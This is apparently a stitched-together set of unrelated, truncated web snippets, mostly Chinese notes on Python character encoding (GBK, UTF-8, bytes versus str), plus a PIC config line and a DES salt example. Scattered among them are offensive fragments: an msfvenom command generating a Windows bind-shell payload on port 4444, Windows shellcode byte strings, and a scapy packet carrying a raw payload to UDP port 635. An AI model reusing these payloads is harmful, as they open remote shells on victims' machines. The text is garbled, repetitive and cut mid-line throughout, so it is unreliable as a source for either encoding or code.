这是 PyCharm 的下载地址:http://www.jetbrains.com/pycharm/download/#section=windows
\xa1\xb0\xa1', '10']['2', '\xb1\xa6\xb1\xa6', '15']['3', '\xb3\xdf\xb4\xe7', '17']['4', '\xb5\xc8 \xb5\xc8', '19']['5', '\xb6\xf7\xb6\xf7', '20']['6', '\xb7\xbd\xb7\xa8', '21']>>> 二、从CSV文件写入内容 使用
WDTEN_ON & WDTPS_512); __CONFIG(3, CCP2MX_PORTC1 & MCLRE_EXTMCLR); __CONFIG(4, LVP_OFF); 那么在新的MPLAB X IDE和XC8 CCP2MX = PORTC1,MCLRE = EXTMCLR #pragma config LVP = OFF 主要参考MPLAB X安装目录下的 C:\Program Files\Microchip\xc8
> s.decode('gbk') u'\u6b22\u8fce' >>> print s.decode('gbk') 欢迎 2 程序有一段从输入得到的 cp936 编码文字,如 '\xd5\xc5\xc8 \xfd'(张三),和从数据库取出的 unicode 字符串,如 u'\u597d\u4eba'(好人),两者需要做拼接时: >>> a = '\xd5\xc5\xc8\xfd' >>> b = u'好人 比如: >>> a = '\xd5\xc5\xc8\xfd' >>> a.encode('utf-8') 原因也是一样,encode 是 unicode 类型的方法,对 str 进行调用时,程序会默认先直接试图用
1758689793017181583485607518128257451365441445520643573250819171196665713945177624962575711#enc = b'g\xf6\xc8 1758689793017181583485607518128257451365441445520643573250819171196665713945177624962575711 # enc = b'g\xf6\xc8 1758689793017181583485607518128257451365441445520643573250819171196665713945177624962575711enc = b'g\xf6\xc8
小记一下: 乱码一:python不能将汉字的bytes直接输出汉字,需要转换成Unicode,然后用print输出: str = b'\xc7\xeb\xca\xb9\xd3\xc3\xca\xda\xc8
有一个盐:对应的python盐为:"\xA9\x9B\xC8\x32\x56\x35\xE3\x03" 对应的python2.7代码: from Crypto.Hash import MD5 from Crypto.Cipher import DES def get_encrypt_param(params): """对参数进行加密封装""" _salt = "\xA9\x9B\xC8 def get_encrypt_param(params): """对参数进行加密封装""" # 定义_salt的时候,直接定义成bytes _salt = b"\xA9\x9B\xC8 pyDes 代码如下: import pyDes def get_encrypt_param(params): """对参数进行加密封装""" _salt = b"\xA9\x9B\xC8
\xd8\xaf\xd2\xa6\xc9\x91\x29\xe3\xd6\xe8\x2\x33\xae\xdf\xba\xbb\xdf\xc7\xdb\x72\xd1\x1a\x15\x10\xa5\xc8 x16\x1e\xc2\xbf\xde\xc1\x7\x93\x9f\x35\x76\x12\x18\x1\xdf\x8c\x26\xde\x2\x7\x13\xe7\xb8\x43\x6d\xb8\xc8 xa\x10\x23\xd2\x8a\x2b\xbf\x49\x2c\x5b\x1e\xa0\xd7\x4d\xf1\x81\xb9\x5\x0\x22\xf0\xf\xd2\xb4\xae\xb3\xc8 \xd8\xaf\xd2\xa6\xc9\x91\x29\xe3\xd6\xe8\x2\x33\xae\xdf\xba\xbb\xdf\xc7\xdb\x72\xd1\x1a\x15\x10\xa5\xc8 x16\x1e\xc2\xbf\xde\xc1\x7\x93\x9f\x35\x76\x12\x18\x1\xdf\x8c\x26\xde\x2\x7\x13\xe7\xb8\x43\x6d\xb8\xc8
hq.sinajs.cn/list=gb_goog') as f : hq = f.read() print(hq) 运行的结果: b'var hq_str_gb_goog="\xb9\xc8 有经验的程序员一眼可以猜出,那个神秘的 \xb9\xc8\xb8\xe8 应该是GBK或GB2312编码的“谷歌”。涉及到字符编码的问题,又是一个大坑,绝对可以讲上7天7夜,这里先不细说了。
x74\x0c\xff\x4e\x08\x75\xec\x68" "\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02" "\xd9\xc8 x10\x00\x00" "\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00" "\x56\x53\x57\x68\x02\xd9\xc8
,string主要是给人看的; 3.string经过编码encode,转化成二进制对象,给计算机识别;bytes经过解码decode,转化成string,让我们看,但是注意反编码的编码规则是有范围,\xc8
xe4\xba\xba\xe4\xba\x86' b'\xce\xd2\xd2\xd1\xbe\xad\xbd\xab\xce\xd2\xb5\xc4\xb9\xb7\xb9\xb7\xcb\xcd\xc8
\xf8\xde\xf7\xbf\x7frv\xea\xe2\xc8\x18#\x91\xd5\xad\xf1\xde\x1b0\x88\xc8\xcc\xd6\xda2/\xbc\xf7! \xee\xf6\xee\xf6\xf6n\'I\x01\xc8 hy\xdf\xf3\x93Y1\x9b"b\x94\x99,\xedNgg\xe8bc\x01! xab\x8bP\xd7\x93I\xf0\xfa\xc8? \xb1\xc8\xf5R,C\x8cT\x18T? \r\x1b\xda,\xc8\n\xc0\xad\xdf\xbf\xfe\xc6\x8a\x80.
iface=iface, count=count) pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load="^\xB0\x02\x89\x06\xFE\xC8
x00\x80\x0e\xfcx\xdc\x7f%<i=\x11#\x80\xbb9\xa7A\xdb\xe4\xa6\x84\x8cD\xb5<\x12%\xe2\x8c\x9c\xdb\xf2@\xc8 >\xe4\xdd\xc89g@m\x05\x91M+\x1aV[RJ\xc8\x0c\x80\xee\x86\x14\x863\x0c\xbb\xb8\x83\x9b"\x10\x0b\x03\x10 \xd7\xd2\x1c\x9c\x88\x84q\x10R\xb3\xa6v\xb3\xcfw\x07A\xc0\xe3\xc8? \xeaf\xdb\x04\x00\x1f\xc8\x1a\x9f<\xb6\xbf\xaew\xb2\x19\xae\x1e. X{\xf0W\xff\xf7\x1f\xae_\xbf\xd9;\xe8m\xed\xec\xb2\xc8\xect\xf7\xc8\xea\xe2\xf9\xb3\xcf\r\x86\xc3\xb5
\x03\x0c0/zP\n\xa4b\x818\xeco\x9c \xc2\r\x90\x18\x13\x03*8\t\xc4b\xbc\x01\xa8X\x07$\xc0\xc8\xb4\xf0>\ x00q H\xc1C\x16\xc9\x94_\xcc\x025\xfd2\x88\xb1\x04 \x88\x85\x90\x14\xfc\x05\xe2( \x16\x00\xe2\xc3\x8c\xc8
\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"? \xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?
xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8 xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8
-p windows/shell_bind_tcp lport=4444 -b "\x00" -f python buf = "" buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8 "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2" buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8
\xa4\x1c\x68\xef\x4a\xe2\xd8\xd0\x2c\xb1\xff\x63\xb2\x26\xd1" "\xe0\x2d\x25\x5e\xd7\x8a\x67\x93\xad\xc8 x0e\x4a\xe9\xf5\x36\x1a\x50\x8b" "\xe1\x44\xff\xf2\x99\xd7\xf6\x26\xa8\x39\xea\xa3\x7a\x63\x1d" "\xa5\xc8 \xa4\x1c\x68\xef\x4a\xe2\xd8\xd0\x2c\xb1\xff\x63\xb2\x26\xd1" "\xe0\x2d\x25\x5e\xd7\x8a\x67\x93\xad\xc8 x0e\x4a\xe9\xf5\x36\x1a\x50\x8b" "\xe1\x44\xff\xf2\x99\xd7\xf6\x26\xa8\x39\xea\xa3\x7a\x63\x1d" "\xa5\xc8